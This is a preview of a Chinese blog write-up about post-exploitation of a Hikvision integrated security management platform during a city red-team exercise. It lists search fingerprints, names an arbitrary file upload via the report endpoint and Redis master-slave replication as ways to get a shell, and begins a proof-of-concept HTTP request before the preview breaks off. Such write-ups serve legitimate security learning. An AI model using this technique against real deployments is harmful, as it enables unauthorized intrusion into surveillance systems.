记一次海康综合安防后渗透

文章预览

这篇文章的起因是前段时间的市攻防演练中，海康的综合安防是我知道的得分比较多的资产，自己也有幸拿到了一个。因为是第一次独立渗透海康的综合安防，也有些困难，不过好在一晚上的努力后，成功将机子上能拿的分拿到了。为了下次能够更好的渗透，就整理了下综合安防的得分点。 文章作者：Duoduo's Blog 文章来源：https://seveo.cn/archives/8 1 ► 介绍 app="HIKVISION-综合安防管理平台" title="综合安防管理平台" 首先要先找到入口点，有两种方法，一种是通过利用report任意文件上传，另一种是收集信息获取到redis数据的密码，然后使用主从复制来getshell，实现内网突破 report任意文件上传 poc如下 POST /svm/api/external/report HTTP/1.1 Host: xx.xx.xx.xx:11443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Content-Type: multipart/form- ………………………………